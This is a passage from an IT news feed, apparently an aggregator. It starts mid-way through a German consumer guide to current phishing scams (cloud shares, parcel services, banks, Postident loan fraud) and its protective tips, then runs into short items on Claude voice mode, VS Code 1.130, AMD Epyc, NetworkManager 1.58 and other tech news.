<p>Cloud-Dienste wie Onedrive von Microsoft nutzen viele Windows-Nutzer mehrmals täglich. Genau deshalb sind sie ein attraktives Ziel für Phishing. Statt klassischer E-Mails mit Dateianhängen erhalten die Nutzer Freigabe-Benachrichtigungen mit einem Betreff wie „Dokument wurde mit Ihnen geteilt“. Der Inhalt wirkt meist harmlos und oft beruflich relevant: Rechnungen, Projektpläne, Gehaltslisten oder interne Dokumente.</p>



<p>Besonders tückisch ist die Kombination aus echten und gefälschten Elementen. Manche Angriffe nutzen tatsächlich legitime Cloud-Plattformen, bieten dort aber manipulierte Dokumente an. Das Ziel dieser Angriffe sind mehrheitlich die Log-in-Daten der Opfer zu Ihren Cloud- und Mail-Konten. Diese werden dann von den Angreifern übernommen und etwa für neue Phishing-Attacken genutzt.</p>



<h2 class="wp-block-heading">5. Lieferdienste, Lieferdienste und noch mal Lieferdienste</h2>



<p>Phishing im Namen von Paketdiensten gehört zu den stabilsten Angriffsmustern überhaupt und wird gleichzeitig immer ausgefeilter. Der Grund ist die hohe Alltagstauglichkeit: Fast jeder erwartet regelmäßig Lieferungen und ist deshalb kaum misstrauisch, wenn eine Mail, SMS oder Whatsapp zum Thema Paketversand eintrudelt. Moderne Varianten enthalten nicht nur einfache Textlinks, sondern vollständige Tracking-Systeme.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697140c0"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Paket-Phishing.png?w=1200" alt="Phishing Fallen Paket Phishing" class="wp-image-3187584" width="1200" height="539" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Hier sehen Sie vier Schritte eines vorgeblichen Lieferdienstes, der Ihnen ein Paket zustellen möchte. In weiteren Schritten sollen Sie Ihr Kundenkonto mit persönlichen Daten vervollständigen und eine Expresslieferung bezahlen.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>



<p>Diese Seiten sind dynamisch aufgebaut und simulieren echte Logistikprozesse. Beim Sendungsverlauf heißt es dann etwa: „Zustellung fehlgeschlagen – bitte Adresse bestätigen“ oder „Letzte Möglichkeit zur Terminänderung“. Besonders kritisch ist die Kombination aus Zeitdruck und Kontext. Wer Opfer eines solchen Angriffs wird, gibt meist seine Log-in-Daten für Shopping- oder Zahlungsdienste preis. Oder er überweist den Angreifern direkt Geld, da angeblich Steuern, Bearbeitungsgebühren oder ein Expresszuschlag fällig sind.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697149f8"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Paket-Phishing-Bezahlung.png?w=1200" alt="Phishing Fallen Paket Phishing Bezahlung" class="wp-image-3187585" width="1200" height="645" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Eine Phishing-Webseite eines vorgeblichen Lieferdienstes, die hier eine Nachzahlung abrechnen möchte, bevor das Paket zugestellt werden kann.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>



<p>Übrigens: Ab dem 1. Juli 2026 gibt es zusätzliche Abgaben auf Sendungen aus Nicht-EU-Ländern. Für Waren unter 150 Euro sind dann pauschal 3 Euro Zollgebühr und eine Einfuhrumsatzsteuer fällig. Einige Kurierdienste verlangen zusätzlich eine Servicepauschale für diese Zollanmeldung. Über die genauen Kosten informiert <a href="https://tinyurl.com/sztfupt4" target="_blank" rel="noreferrer noopener">eine Seite der Verbraucherzentrale NRW</a>. Es lohnt sich, die tatsächlichen Kosten zu kennen, denn es ist wahrscheinlich, dass zu diesem Termin vermehrt Phishing-Mails zu diesem Thema versendet werden.</p>



<h2 class="wp-block-heading">6. Phishing zu Online-Banking gibt es immer</h2>



<p>Phishing zum Online-Banking gibt es fast schon so lange wie das Online-Banking selbst. Die Bedrohungslage ist aber so angespannt wie nie, denn die Angriffe sind nun wirklich zahlreich. <a href="https://tinyurl.com/y58m5smy" target="_blank" rel="noreferrer noopener">Über die neuesten Phishing-Fallen informieren unter anderem die Verbraucherzentralen</a>.</p>



<p>Beispiele aus dem Mai 2026 lauten etwa so: „Bestätigung Ihrer Mobilfunknummer erforderlich“. Absender ist vorgeblich die Easybank. Eine Fälschung von Commerzbank-Mails warnt vor einem fälligen „Photo-TAN Update“, bei dem ein „einmaliger Abgleich der Zugangsdaten“ nötig ist. </p>



<p>Andere Phishing-Mails geben vor, von der Deutschen Bank zu sein, und fordern eine Reaktivierung des „photoTAN-Sicherheitszertifikats“. Auch Kunden der DKB erhielten im Mai Phishing-Mails.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697157e7"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-commerzbank2-Quelle-Verbraucherzentrale.png" alt="Phishing Fallen commerzbank2 Quelle Verbraucherzentrale" class="wp-image-3187583" width="460" height="665" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Eine aktuelle Phishing-Mail, die auf Kunden der Commerzbank abzielt. Im Text wird ordentlich Druck aufgebaut. Wer nicht reagiert, verliert angeblich „am nächsten Werktag“ den Zugriff auf sein Bankkonto.</p></figcaption></figure><p class="imageCredit">Verbraucherzentrale</p></div>



<p>Sollten Sie eine Mail von Ihrer Bank bekommen, klicken Sie auf keinen Fall auf einen der Links in dieser Mail. Wenn Sie sich unsicher sind, ob Sie reagieren sollen, rufen Sie die Website Ihrer Bank über Ihren Browser auf. </p>



<p>Sollte es tatsächlich ein Anliegen der Bank geben, wird es Ihnen nach dem Einloggen in Ihr Online-Konto angezeigt. Oder Sie rufen Ihre Bank einfach per Telefon an und fragen, ob Informationen von Ihnen benötigt werden.</p>



<h2 class="wp-block-heading">7. Phishing per Post: Kreditbetrug per Postident-Verfahren</h2>



<p>Diese Phishing-Angriffe erreichen Sie per Post in Ihrem echten Briefkasten. Die Briefe geben vor, von Ihrer Bank zu stammen, und fordern Sie auf, Ihre Daten erneut per Postident zu bestätigen. Postident ist ein Verfahren der Post, mit dem Sie Ihre Identität gegenüber anderen, etwa einer neuen Bank oder einem Kreditinstitut, bestätigen können. Wer das beigefügte Schreiben nutzt, legitimiert in der Regel einen hohen Kredit bei einer anderen Bank.</p>



<p>Schäden von 15.000 bis 25.000 Euro sind hier keine Seltenheit. Vorangegangen ist meist ein Diebstahl Ihrer genauen Daten (Postadresse, Hausbank, Arbeitgeber, Verdienst), den die Angreifer dann nutzen. An die Daten kommen die Kriminellen etwa über gefälschte Wohnungsinserate bei Immoscout24 oder ähnlichen Portalen. Wer sich auf eine Wohnung oder ein Haus mit Gehaltszetteln und weiteren Angaben bewirbt, hat bereits alle wichtigen Daten für den Postident-Betrug verraten. Seien Sie beim Postident-Verfahren stets besonders vorsichtig. Konkrete Tipps lesen Sie <a href="https://tinyurl.com/bdbnmxhn" target="_blank" rel="noreferrer noopener">hier</a>.</p>



<h2 class="wp-block-heading">Sicherheitstipps: Phishing erkennen und blockieren</h2>



<p><strong>An diesen Merkmalen erkennen Sie betrügerische Nachrichten:</strong></p>



<ul class="wp-block-list">
<li><strong>Unverlangter Kontakt:</strong> Sie erhalten eine E-Mail, Whatsapp oder SMS über eine Gutschrift, eine Lastschrift oder andere finanzielle Ansprüche, obwohl Sie aktuell keine Buchung storniert oder reklamiert haben.</li>



<li><strong>Zeitdruck:</strong> Die Nachricht suggeriert dringenden Handlungsbedarf und fordert zur schnellen Reaktion auf.</li>



<li><strong>Verdächtige Links:</strong> Die Links in der Nachricht sind hinter einem QR-Code maskiert, führen zu unpassenden Domains oder sind ungewöhnlich lang.</li>



<li><strong>Aufforderung zur Dateneingabe:</strong> Seriöse Unternehmen fordern in Nachrichten oder Mails nur äußerst selten zur Eingabe sensibler Daten auf.</li>



<li><strong>Unpersönliche Anrede:</strong> Oft fehlt die namentliche Ansprache oder es werden generische Formulierungen verwendet.</li>
</ul>



<p><strong>Diese Maßnahmen schützen vor Phishing-Fallen:</strong></p>



<ul class="wp-block-list">
<li><strong>E-Mail, SMS und Whatsapp &amp; Co. sind keine geschlossenen Nachrichtenkanäle:</strong> Sie müssen damit rechnen, auch betrügerische Nachrichten zu erhalten.</li>



<li><strong>Misstrauen Sie Links in Nachrichten:</strong> Klicken Sie keine Links an und scannen Sie keine QR-Codes, wenn Log-in-, Zahlungs- oder Sicherheitsaufforderungen in der Mail stehen. Öffnen Sie den jeweiligen Dienst im Browser über die manuelle Eingabe der Adresse.</li>



<li><strong>Nutzen Sie Browser und Passwortmanager als Frühwarnsystem: </strong>Wenn Ihr <a href="https://www.pcwelt.de/article/1204833/test-die-besten-passwort-manager.html" target="_blank" rel="noreferrer noopener">Passwortmanager</a> Ihre Log-in-Daten auf einer Webseite nicht einfügen möchte, dann ist die Domain vermutlich gefälscht. Achten Sie zudem auf die Warnungen Ihres Browsers.</li>



<li><strong>MFA aktivieren: </strong>Nutzen Sie immer eine Zwei- oder Multifaktor-Authentifizierung, wenn diese angeboten wird. Vor allem <a href="http://www.pcwelt.de/2107907" target="_blank" rel="noreferrer noopener">Passkeys</a> erhöhen die Sicherheit.</li>



<li><strong>Remote-Support misstrauen: </strong>Installieren Sie keine Fernwartungs-Tools, nachdem Sie unaufgefordert kontaktiert wurden.</li>



<li><strong>Freigaben hinterfragen: </strong>Wenn Sie Freigaben für Dateien in Cloud-Speichern erhalten, kontaktieren Sie zunächst den Absender, idealerweise telefonisch.</li>
</ul>



<p>Infos zu aktuellen Angriffen: Informieren Sie sich über Phishing-Kampagnen etwa bei der <a href="https://tinyurl.com/y58m5smy" target="_blank" rel="noreferrer noopener">Verbraucherzentrale NRW</a>.</p>



<p><strong>Als letzte Verteidigungslinie lassen sich Antivirenprogramme, Browserschutz und Spezial-Tools einsetzen:</strong></p>



<ul class="wp-block-list">
<li><strong>Antivirus:</strong> Große Sicherheits-Suiten wie <a href="https://www.awin1.com/cread.php?awinmid=14693&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=http://www.gdata.de" target="_blank" rel="noreferrer noopener">G Data Internet Security</a> filtern Phishing-Mails heraus, bevor sie diese Nachrichten öffnen.</li>



<li><strong>Browser-Schutz: </strong>Browser von Sicherheitsanbietern blockieren viele aktuelle Phishing-Seiten, etwa der <a href="https://neobrowser.ai/" target="_blank" rel="noreferrer noopener">KI-Browser Norton Neo</a>.</li>



<li><strong>Spezial-Tools:</strong> KI-Chatbots wie <a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11660&amp;clickref=rss&amp;ued=http://www.bitdefender.com/de-de/consumer/scamio" target="_blank" rel="noreferrer noopener">Scamio von Bitdefender</a> begutachten verdächtige Nachrichten und warnen vor gefährlichen Inhalten.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a63269717055"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Verdaechtige-Website-blockiert-Neo.png?w=1200" alt="Phishing Fallen Verdaechtige Website blockiert Neo" class="wp-image-3187587" width="1200" height="645" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Einen guten Phishing-Schutz erhalten Sie beispielsweise über Browser von Sicherheitsanbietern wie hier dem Browser Norton Neo.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic Upgrades Claude Voice Mode With Opus and Sonnet Support]]></title>
<description><![CDATA[Claude voice mode now supports Anthropic’s Opus and Sonnet models, giving users access to stronger reasoning and more capable responses during spoken conversations. Until now, voice mode only worked with the faster Haiku model, which focused more on speed than deeper analysis.







The upgrade ...]]></description>
<link>https://tsecurity.de/de/3690931/ios-mac-os/anthropic-upgrades-claude-voice-mode-with-opus-and-sonnet-support/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690931/ios-mac-os/anthropic-upgrades-claude-voice-mode-with-opus-and-sonnet-support/</guid>
<pubDate>Fri, 24 Jul 2026 09:40:42 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Claude voice mode now supports Anthropic’s Opus and Sonnet models, giving users access to stronger reasoning and more capable responses during spoken conversations. Until now, voice mode only worked with the faster Haiku model, which focused more on speed than deeper analysis.







The upgrade brings Claude’s voice experience closer to the intelligence already available through text chats. Paid users can now use the more advanced models while speaking, which should make voice conversations more useful for research, planning, writing, and detailed questions.




https://www.youtube.com/watch?v=GWnNMfFivnk




Claude voice mode gets model switching and connectors



Anthropic also lets users switch between models while using voice mode, so they can choose a faster or more capable option based on the task. Voice mode now works with connectors as well, allowing Claude to interact with supported tools and services during a conversation.



The updated voice mode supports 11 languages:




English



French



German



Hindi



Indonesian



Italian



Japanese



Korean



Portuguese in Brazil



Spanish in Latin America



Spanish in Spain




Users can also switch between supported languages during the same voice session. Claude voice mode is available through Anthropic’s mobile, desktop, and web apps, making the upgraded experience accessible across major platforms.]]></content:encoded>
</item>
<item>
<title><![CDATA[Governing Al agents at scale: Lessons from the leaders who’ve done it]]></title>
<description><![CDATA[Enterprise AI leaders from ZoomInfo, Docusign and AppViewX share what it took to build AI Centers of Excellence and govern agent identities inside two companies operating at scale. What you’ll take away: What an AI Center of Excellence looks like day to day at ZoomInfo and Docusign How to govern ...]]></description>
<link>https://tsecurity.de/de/3690798/it-security-nachrichten/governing-al-agents-at-scale-lessons-from-the-leaders-whove-done-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690798/it-security-nachrichten/governing-al-agents-at-scale-lessons-from-the-leaders-whove-done-it/</guid>
<pubDate>Fri, 24 Jul 2026 08:10:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise AI leaders from ZoomInfo, Docusign and AppViewX share what it took to build AI Centers of Excellence and govern agent identities inside two companies operating at scale. What you’ll take away: What an AI Center of Excellence looks like day to day at ZoomInfo and Docusign How to govern agent identities without standing up a parallel identity stack The traps both leaders worked hard to avoid, and what they’d do differently now What Venkat … <a href="https://www.helpnetsecurity.com/2026/07/24/governing-al-agents-at-scale-video/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/24/governing-al-agents-at-scale-video/">Governing Al agents at scale: Lessons from the leaders who’ve done it</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Visual Studio Code 1.130 shines on Agents window]]></title>
<description><![CDATA[Microsoft has released Visual Studio Code 1.130, an update to the code editor that brings several improvements to the Agents window, along with enhancements to the agent host and the terminal.



VS Code 1.130 was released on July 22, one week after VS Code 1.129. Developers can access the releas...]]></description>
<link>https://tsecurity.de/de/3690529/ai-nachrichten/visual-studio-code-1130-shines-on-agents-window/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690529/ai-nachrichten/visual-studio-code-1130-shines-on-agents-window/</guid>
<pubDate>Fri, 24 Jul 2026 03:37:26 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft has released Visual Studio Code 1.130, an update to the code editor that brings several improvements to the Agents window, along with enhancements to the agent host and the terminal.</p>



<p class="wp-block-paragraph">VS Code 1.130 was released on <a href="https://code.visualstudio.com/updates/v1_130#_agents-window-improvements-preview">July 22</a>, one week after <a href="https://www.infoworld.com/article/4199680/visual-studio-code-1-129-introduces-dedicated-agent-host.html">VS Code 1.129</a>. Developers can access the release for Windows, Linux, or Mac from <a href="https://code.visualstudio.com/Download?_exp_download=fb315fc982">code.visualstudio.com</a>. </p>



<p class="wp-block-paragraph">With the new release, the <a href="https://code.visualstudio.com/docs/agents/agents-window">Agents window</a> gets updates that make it easier to review changes and manage chats. File-level diff statistics help users assess the size of each file’s changes when scanning a multi-file diff. The window also gets a more compact multi-file diff that makes it easier to review changes, Microsoft said. The Agents window is a dedicated window in VS Code that lets users run and track multiple agent sessions in parallel across their projects, without opening each workspace in a separate window.</p>



<p class="wp-block-paragraph">Also with VS Code 1.130, assisted permissions for agent tool calls are available in the <a href="https://code.visualstudio.com/updates/v1_130#_the-agent-host" data-type="link" data-id="https://code.visualstudio.com/updates/v1_130#_the-agent-host">agent host</a>. With assisted permissions, the LLM evaluates the risk of each tool call and decides whether the tool can run or should require the user’s approval. The setting to enable assisted permissions is <code>chat.assistedPermissions.enabled</code>. In another agent host improvement, quick chats running on the agent host now use compact, single-line rows in the sessions list. Regular sessions retain a second line with change statistics, status, and timestamps. </p>



<p class="wp-block-paragraph">VS Code users now can open file links from Git diff output in the terminal when Git’s <a href="https://git-scm.com/docs/diff-config#Documentation/diff-config.txt-diffmnemonicPrefix" target="_blank" rel="noreferrer noopener"><code>diff.mnemonicPrefix</code></a> option is enabled. VS Code recognizes prefixes such as<code> i/</code> for the index and <code>w/</code> for the working tree, and removes the prefix from the link target so the correct file opens. When mnemonic prefixes are enabled, VS Code also recognizes the numeric prefixes produced by <code>git diff --no-index</code>.</p>



<p class="wp-block-paragraph">Timestamps for chat requests and responses now are displayed when users hover over the message toolbar. You can disable this through the <code>chat.verbose</code> setting. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 now supports resuming WhatsApp from Android, but you’ll wait longer for the app to load]]></title>
<description><![CDATA[Windows 11's cross-device Resume feature has reached WhatsApp, letting you tap a taskbar badge to pick up Android chats on your PC. I tested it, and while the idea mirrors Apple's Handoff nicely, WhatsApp's sluggish WebView2 wrapper takes so long to load that picking up your phone is faster.
The ...]]></description>
<link>https://tsecurity.de/de/3690433/windows-tipps/windows-11-now-supports-resuming-whatsapp-from-android-but-youll-wait-longer-for-the-app-to-load/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690433/windows-tipps/windows-11-now-supports-resuming-whatsapp-from-android-but-youll-wait-longer-for-the-app-to-load/</guid>
<pubDate>Fri, 24 Jul 2026 01:31:30 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Windows 11's cross-device Resume feature has reached WhatsApp, letting you tap a taskbar badge to pick up Android chats on your PC. I tested it, and while the idea mirrors Apple's Handoff nicely, WhatsApp's sluggish WebView2 wrapper takes so long to load that picking up your phone is faster.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/07/24/windows-11-now-supports-resuming-whatsapp-from-android-but-youll-wait-longer-for-the-app-to-load/">Windows 11 now supports resuming WhatsApp from Android, but you’ll wait longer for the app to load</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI won't let some customers export their chats, but this tool will]]></title>
<description><![CDATA[ChatGPT Business and Enterprise users lack the standard chat export option, so third-party utilities like scrapemychats fill the gap]]></description>
<link>https://tsecurity.de/de/3690292/it-nachrichten/openai-wont-let-some-customers-export-their-chats-but-this-tool-will/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690292/it-nachrichten/openai-wont-let-some-customers-export-their-chats-but-this-tool-will/</guid>
<pubDate>Thu, 23 Jul 2026 23:52:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ChatGPT Business and Enterprise users lack the standard chat export option, so third-party utilities like scrapemychats fill the gap]]></content:encoded>
</item>
<item>
<title><![CDATA[AMD Epyc CPU Roadmap: Auf Venice folgen Florence (Zen 7) und Ravenna (Zen 8)]]></title>
<description><![CDATA[Heute fällt der Startschuss für AMD Epyc Venice als neue Server-Prozessoren mit Zen-6-Architektur. Parallel gibt es einen Ausblick auf die Nachfolger. Laut Epyc-Roadmap folgt 2028 Florence mit Zen 7 und AI Compute Extensions. Zwei Jahre später soll bereits Ravenna mit Zen 8 im Jahr 2030 erscheinen.]]></description>
<link>https://tsecurity.de/de/3690115/it-nachrichten/amd-epyc-cpu-roadmap-auf-venice-folgen-florence-zen-7-und-ravenna-zen-8/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690115/it-nachrichten/amd-epyc-cpu-roadmap-auf-venice-folgen-florence-zen-7-und-ravenna-zen-8/</guid>
<pubDate>Thu, 23 Jul 2026 21:52:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/9/4/9-c44372c9f6df7a46/article-640x360.f8b164c2.jpg"><p>Heute fällt der Startschuss für AMD Epyc Venice als neue Server-Prozessoren mit Zen-6-Architektur. Parallel gibt es einen Ausblick auf die Nachfolger. Laut Epyc-Roadmap folgt 2028 Florence mit Zen 7 und AI Compute Extensions. Zwei Jahre später soll bereits Ravenna mit Zen 8 im Jahr 2030 erscheinen.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NetworkManager update advances IPv6-only support, Wi‑Fi management, and security for Linux-based operating systems]]></title>
<description><![CDATA[Networking is core to any operating system, and when it comes to Linux, it’s actually a combination of several key components. The Linux kernel handles the data plane, moving packets, and holding live device state. NetworkManager is the network configuration service, operating as the control plan...]]></description>
<link>https://tsecurity.de/de/3690083/it-security-nachrichten/networkmanager-update-advances-ipv6-only-support-wifi-management-and-security-for-linux-based-operating-systems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690083/it-security-nachrichten/networkmanager-update-advances-ipv6-only-support-wifi-management-and-security-for-linux-based-operating-systems/</guid>
<pubDate>Thu, 23 Jul 2026 21:34:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Networking is core to any operating system, and when it comes to Linux, it’s actually a combination of several key components. The Linux kernel handles the data plane, moving packets, and holding live device state. NetworkManager is the network configuration service, operating as the control plane, deciding what a device’s configuration should be.</p>



<p class="wp-block-paragraph"><a href="https://gitlab.freedesktop.org/NetworkManager/NetworkManager/-/releases/1.58.0">NetworkManager 1.58</a> was released this week, following more than five months of development and 407 commits since version 1.56. The release covers three areas: expanded support for IPv6-only networks, a set of Wi-Fi management updates, and a round of security hardening.</p>



<p class="wp-block-paragraph">IPv4 address exhaustion remains the pressure behind the first of those areas, pushing more networks toward IPv6-only operation every year.</p>



<p class="wp-block-paragraph">“More networks, mobile carriers, cloud providers, and anyone squeezed by IPv4 exhaustion are running IPv6-only by default,” <a href="https://www.linkedin.com/in/vanhoof/">Chris Van Hoof</a>, director of Linux engineering, platform enablement at Red Hat, told <em>Network World</em>.</p>



<h2 class="wp-block-heading">Advancing IPv6-only support</h2>



<p class="wp-block-paragraph">Dual stack networking, running IPv4 and IPv6 in parallel, has been the default IPv6 transition strategy for years. Dual stack networking, however, has a structural problem in that it still requires an IPv4 address on every device, so it does nothing to relieve address exhaustion pressure.</p>



<p class="wp-block-paragraph">An alternative model called IPv6-mostly addresses that gap. It is defined in RFC 8925, “IPv6-Only-Preferred Option for DHCPv4,” and lets capable clients drop IPv4 entirely while legacy hosts that still need it keep receiving it on the same network segment.</p>



<p class="wp-block-paragraph">“NetworkManager can also now auto-signal RFC 8925’s IPv6-only-preferred option, telling the network a host is fine skipping an IPv4 lease entirely,” Van Hoof said.</p>



<p class="wp-block-paragraph">For the traffic that still needs IPv4, NetworkManager 1.58 adds support for CLAT, short for customer-side translator. CLAT is the client-side half of 464XLAT, a mechanism defined in RFC 6877, “464XLAT: Combination of Stateful and Stateless Translation.”</p>



<p class="wp-block-paragraph">464XLAT pairs CLAT on the endpoint, which performs stateless header translation, with a stateful NAT64 translator on the provider side, letting IPv4-only apps keep functioning on a network that has no IPv4 of its own.</p>



<p class="wp-block-paragraph">“CLAT is the translation layer that lets legacy IPv4-only apps and services keep working on those networks without bolt-on middleware,” Van Hoof said.</p>



<h2 class="wp-block-heading">Wi-Fi management updates</h2>



<p class="wp-block-paragraph">NetworkManager 1.58 also brings a set of changes to how the daemon handles Wi-Fi connections and configuration.</p>



<ul class="wp-block-list">
<li><strong>Band selection: </strong>The band property of Wi-Fi connections now accepts a 6GHz value, and a Wi-Fi scan run through nmcli, NetworkManager’s command line tool, now shows each access point’s band as well.</li>



<li><strong>Credential handling:</strong> WPS credentials with a 64 character hex PSK are now accepted, matching what some access points return.</li>



<li><strong>Text interface improvements:</strong> nmtui, NetworkManager’s menu driven text interface, picked up several usability additions. A new device select button lets you choose a physical interface from a list instead of typing its name. The activation screen gained a rescan Wi-Fi button, and secret prompts now include a show password checkbox. There is also a share QR code option, mirroring the existing nmcli device wifi show-password command.</li>
</ul>



<h2 class="wp-block-heading">Security hardening</h2>



